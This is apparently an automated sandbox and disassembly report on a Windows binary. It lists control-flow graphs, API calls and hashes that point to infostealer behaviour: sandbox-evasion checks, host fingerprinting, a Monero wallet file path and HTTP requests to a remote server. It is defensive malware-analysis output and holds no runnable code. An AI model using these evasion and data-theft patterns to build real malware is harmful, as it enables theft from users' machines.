                                • Opcode ID: 15220ad5397087159140148160aa1a9ce684bf8e0f5ecbaaa7db7c4aeb4ea3a3
                                • Instruction ID: 44cff992201395ad47bdee7d934bd4aa976205a06850b1e8d273f03bc709d2a2
                                • Opcode Fuzzy Hash: 15220ad5397087159140148160aa1a9ce684bf8e0f5ecbaaa7db7c4aeb4ea3a3
                                • Instruction Fuzzy Hash: FE712E71A40218ABEB24DFA0DC49FEE7778FB84705F108198F50A6B1D0DBB56A85CF52

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1090 945510-945577 call 945ad0 call 94a820 * 3 call 94a740 * 4 1106 94557c-945583 1090->1106 1107 945585-9455b6 call 94a820 call 94a7a0 call 931590 call 9451f0 1106->1107 1108 9455d7-94564c call 94a740 * 2 call 931590 call 9452c0 call 94a8a0 call 94a800 call 94aad0 StrCmpCA 1106->1108 1123 9455bb-9455d2 call 94a8a0 call 94a800 1107->1123 1134 945693-9456a9 call 94aad0 StrCmpCA 1108->1134 1138 94564e-94568e call 94a7a0 call 931590 call 9451f0 call 94a8a0 call 94a800 1108->1138 1123->1134 1139 9457dc-945844 call 94a8a0 call 94a820 * 2 call 931670 call 94a800 * 4 call 946560 call 931550 1134->1139 1140 9456af-9456b6 1134->1140 1138->1134 1271 945ac3-945ac6 1139->1271 1142 9456bc-9456c3 1140->1142 1143 9457da-94585f call 94aad0 StrCmpCA 1140->1143 1146 9456c5-945719 call 94a820 call 94a7a0 call 931590 call 9451f0 call 94a8a0 call 94a800 1142->1146 1147 94571e-945793 call 94a740 * 2 call 931590 call 9452c0 call 94a8a0 call 94a800 call 94aad0 StrCmpCA 1142->1147 1161 945865-94586c 1143->1161 1162 945991-9459f9 call 94a8a0 call 94a820 * 2 call 931670 call 94a800 * 4 call 946560 call 931550 1143->1162 1146->1143 1147->1143 1250 945795-9457d5 call 94a7a0 call 931590 call 9451f0 call 94a8a0 call 94a800 1147->1250 1168 945872-945879 1161->1168 1169 94598f-945a14 call 94aad0 StrCmpCA 1161->1169 1162->1271 1175 9458d3-945948 call 94a740 * 2 call 931590 call 9452c0 call 94a8a0 call 94a800 call 94aad0 StrCmpCA 1168->1175 1176 94587b-9458ce call 94a820 call 94a7a0 call 931590 call 9451f0 call 94a8a0 call 94a800 1168->1176 1198 945a16-945a21 Sleep 1169->1198 1199 945a28-945a91 call 94a8a0 call 94a820 * 2 call 931670 call 94a800 * 4 call 946560 call 931550 1169->1199 1175->1169 1274 94594a-94598a call 94a7a0 call 931590 call 9451f0 call 94a8a0 call 94a800 1175->1274 1176->1169 1198->1106 1199->1271 1250->1143 1274->1169
                                APIs
                                  • Part of subcall function 0094A820: lstrlen.KERNEL32(00934F05,?,?,00934F05,00950DDE), ref: 0094A82B
                                  • Part of subcall function 0094A820: lstrcpy.KERNEL32(00950DDE,00000000), ref: 0094A885
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00945644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009456A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00945857
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                  • Part of subcall function 009451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00945228
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 009452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00945318
                                  • Part of subcall function 009452C0: lstrlen.KERNEL32(00000000), ref: 0094532F
                                  • Part of subcall function 009452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00945364
                                  • Part of subcall function 009452C0: lstrlen.KERNEL32(00000000), ref: 00945383
                                  • Part of subcall function 009452C0: lstrlen.KERNEL32(00000000), ref: 009453AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0094578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00945940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00945A0C
                                • Sleep.KERNEL32(0000EA60), ref: 00945A1B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934
                                • Opcode ID: 54e52d268093d796c8d6aa37bf8d60299a24348047cf3a8359df9f21a1588034
                                • Instruction ID: ced24c18dbb201631004875d677b0a25b965b4a3d7b57816d3f8fbea355d3a71
                                • Opcode Fuzzy Hash: 54e52d268093d796c8d6aa37bf8d60299a24348047cf3a8359df9f21a1588034
                                • Instruction Fuzzy Hash: 5FE1FD72950104ABDB14FBB0DC96FED737DAFD4304F508528B506671A2EF34AA49CBA2

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1301 9417a0-9417cd call 94aad0 StrCmpCA 1304 9417d7-9417f1 call 94aad0 1301->1304 1305 9417cf-9417d1 ExitProcess 1301->1305 1309 9417f4-9417f8 1304->1309 1310 9419c2-9419cd call 94a800 1309->1310 1311 9417fe-941811 1309->1311 1312 941817-94181a 1311->1312 1313 94199e-9419bd 1311->1313 1315 941835-941844 call 94a820 1312->1315 1316 941970-941981 StrCmpCA 1312->1316 1317 9418f1-941902 StrCmpCA 1312->1317 1318 941951-941962 StrCmpCA 1312->1318 1319 941932-941943 StrCmpCA 1312->1319 1320 941913-941924 StrCmpCA 1312->1320 1321 94185d-94186e StrCmpCA 1312->1321 1322 94187f-941890 StrCmpCA 1312->1322 1323 941821-941830 call 94a820 1312->1323 1324 9418ad-9418be StrCmpCA 1312->1324 1325 9418cf-9418e0 StrCmpCA 1312->1325 1326 94198f-941999 call 94a820 1312->1326 1327 941849-941858 call 94a820 1312->1327 1313->1309 1315->1313 1342 941983-941986 1316->1342 1343 94198d 1316->1343 1333 941904-941907 1317->1333 1334 94190e 1317->1334 1339 941964-941967 1318->1339 1340 94196e 1318->1340 1337 941945-941948 1319->1337 1338 94194f 1319->1338 1335 941926-941929 1320->1335 1336 941930 1320->1336 1348 941870-941873 1321->1348 1349 94187a 1321->1349 1350 941892-94189c 1322->1350 1351 94189e-9418a1 1322->1351 1323->1313 1329 9418c0-9418c3 1324->1329 1330 9418ca 1324->1330 1331 9418e2-9418e5 1325->1331 1332 9418ec 1325->1332 1326->1313 1327->1313 1329->1330 1330->1313 1331->1332 1332->1313 1333->1334 1334->1313 1335->1336 1336->1313 1337->1338 1338->1313 1339->1340 1340->1313 1342->1343 1343->1313 1348->1349 1349->1313 1352 9418a8 1350->1352 1351->1352 1352->1313
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 009417C5
                                • ExitProcess.KERNEL32 ref: 009417D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 436e92b7d46f3b6e003d3225c86706e07b6ef6f669b301f31be3615ff0d4aba5
                                • Instruction ID: 2897857abeeea015c6d980402f0edcbf2db21a77d180e3b343ab8f3b1aea6c62
                                • Opcode Fuzzy Hash: 436e92b7d46f3b6e003d3225c86706e07b6ef6f669b301f31be3615ff0d4aba5
                                • Instruction Fuzzy Hash: F1514DB5B1420AEBDB04DFA1E994FBE77B5BF84704F108448E806A7340E774E995CB62

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1356 947500-94754a GetWindowsDirectoryA 1357 947553-9475c7 GetVolumeInformationA call 948d00 * 3 1356->1357 1358 94754c 1356->1358 1365 9475d8-9475df 1357->1365 1358->1357 1366 9475e1-9475fa call 948d00 1365->1366 1367 9475fc-947617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 947628-947658 wsprintfA call 94a740 1367->1369 1370 947619-947626 call 94a740 1367->1370 1377 94767e-94768e 1369->1377 1370->1377
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00947542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0094757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0094760A
                                • wsprintfA.USER32 ref: 00947640
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\
                                • API String ID: 1544550907-3809124531
                                • Opcode ID: 88557aec08a69a3708ed7e40bfdf30d96531a808ce4bf0fd05aa2ed2409fa841
                                • Instruction ID: 6df8380ddd4e79737687fe88f489c4c59d73ff366d631d71bf4d387c66587923
                                • Opcode Fuzzy Hash: 88557aec08a69a3708ed7e40bfdf30d96531a808ce4bf0fd05aa2ed2409fa841
                                • Instruction Fuzzy Hash: 364193B1D04248ABDF10DF94DC45FEEBBB8EF48704F104199F50967280DB78AA84CBA6

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015B2488), ref: 009498A1
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015B2218), ref: 009498BA
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015B2428), ref: 009498D2
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015B2458), ref: 009498EA
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015B22A8), ref: 00949903
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015B9088), ref: 0094991B
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015A5910), ref: 00949933
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015A5810), ref: 0094994C
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015B2470), ref: 00949964
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015B2350), ref: 0094997C
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015B2380), ref: 00949995
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015B2338), ref: 009499AD
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015A5790), ref: 009499C5
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015B22F0), ref: 009499DE
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 009311D0: ExitProcess.KERNEL32 ref: 00931211
                                  • Part of subcall function 00931160: GetSystemInfo.KERNEL32(?), ref: 0093116A
                                  • Part of subcall function 00931160: ExitProcess.KERNEL32 ref: 0093117E
                                  • Part of subcall function 00931110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0093112B
                                  • Part of subcall function 00931110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00931132
                                  • Part of subcall function 00931110: ExitProcess.KERNEL32 ref: 00931143
                                  • Part of subcall function 00931220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0093123E
                                  • Part of subcall function 00931220: ExitProcess.KERNEL32 ref: 00931294
                                  • Part of subcall function 00946770: GetUserDefaultLangID.KERNEL32 ref: 00946774
                                  • Part of subcall function 00931190: ExitProcess.KERNEL32 ref: 009311C6
                                  • Part of subcall function 00947850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009311B7), ref: 00947880
                                  • Part of subcall function 00947850: RtlAllocateHeap.NTDLL(00000000), ref: 00947887
                                  • Part of subcall function 00947850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0094789F
                                  • Part of subcall function 009478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947910
                                  • Part of subcall function 009478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00947917
                                  • Part of subcall function 009478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0094792F
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015B90F8,?,0095110C,?,00000000,?,00951110,?,00000000,00950AEF), ref: 00946ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00946AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00946AF9
                                • Sleep.KERNEL32(00001770), ref: 00946B04
                                • CloseHandle.KERNEL32(?,00000000,?,015B90F8,?,0095110C,?,00000000,?,00951110,?,00000000,00950AEF), ref: 00946B1A
                                • ExitProcess.KERNEL32 ref: 00946B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2931873225-0
                                • Opcode ID: aa9c960953a2906c09866bfe7cee711418b03b9c338cbd872e55e529d118a727
                                • Instruction ID: a8709b4448b0e10a5c9cb066cce7401b4fcb304d34767fe2e2c25624c2dc6cca
                                • Opcode Fuzzy Hash: aa9c960953a2906c09866bfe7cee711418b03b9c338cbd872e55e529d118a727
                                • Instruction Fuzzy Hash: 25311C71944208AAEB08FBF0DC56FEE7778EFC4345F104518F612A2192DF706A45CBA6

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1436 946af3 1437 946b0a 1436->1437 1439 946b0c-946b22 call 946920 call 945b10 CloseHandle ExitProcess 1437->1439 1440 946aba-946ad7 call 94aad0 OpenEventA 1437->1440 1445 946af5-946b04 CloseHandle Sleep 1440->1445 1446 946ad9-946af1 call 94aad0 CreateEventA 1440->1446 1445->1437 1446->1439
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015B90F8,?,0095110C,?,00000000,?,00951110,?,00000000,00950AEF), ref: 00946ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00946AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00946AF9
                                • Sleep.KERNEL32(00001770), ref: 00946B04
                                • CloseHandle.KERNEL32(?,00000000,?,015B90F8,?,0095110C,?,00000000,?,00951110,?,00000000,00950AEF), ref: 00946B1A
                                • ExitProcess.KERNEL32 ref: 00946B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: 1532c628f6b47e76ead72ed7c22e5cb2c94b2175621561fc3c46e34841d00764
                                • Instruction ID: 02847ab1bc493557b1bb502969db6817ca87365872493851dbb5466d7143bdd8
                                • Opcode Fuzzy Hash: 1532c628f6b47e76ead72ed7c22e5cb2c94b2175621561fc3c46e34841d00764
                                • Instruction Fuzzy Hash: 41F08CB0A44219AFE740ABA0DC0AFBE7B78FB85701F104914F517E21C1CFB05980DAA7

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00934839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00934849
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: fb859dbc2477604033ffaf3f2460f261acf8b757a1339740bcd3f5db3789c45c
                                • Instruction ID: 9b76c2bd867db32b9db695e5e5362de0157164c850060214fe2c21e3edf59616
                                • Opcode Fuzzy Hash: fb859dbc2477604033ffaf3f2460f261acf8b757a1339740bcd3f5db3789c45c
                                • Instruction Fuzzy Hash: E8214FB1D00208ABDF14DFA4E845BDD7B75FB44320F108625F919A72D0DB706A05CF92

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                  • Part of subcall function 00936280: InternetOpenA.WININET(00950DFE,00000001,00000000,00000000,00000000), ref: 009362E1
                                  • Part of subcall function 00936280: StrCmpCA.SHLWAPI(?,015BFC50), ref: 00936303
                                  • Part of subcall function 00936280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00936335
                                  • Part of subcall function 00936280: HttpOpenRequestA.WININET(00000000,GET,?,015BF098,00000000,00000000,00400100,00000000), ref: 00936385
                                  • Part of subcall function 00936280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009363BF
                                  • Part of subcall function 00936280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009363D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00945228
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: 158de1e07cb6ea03cad2b46027c9f282fe92e97bf75e39f35b5b159bd390dad2
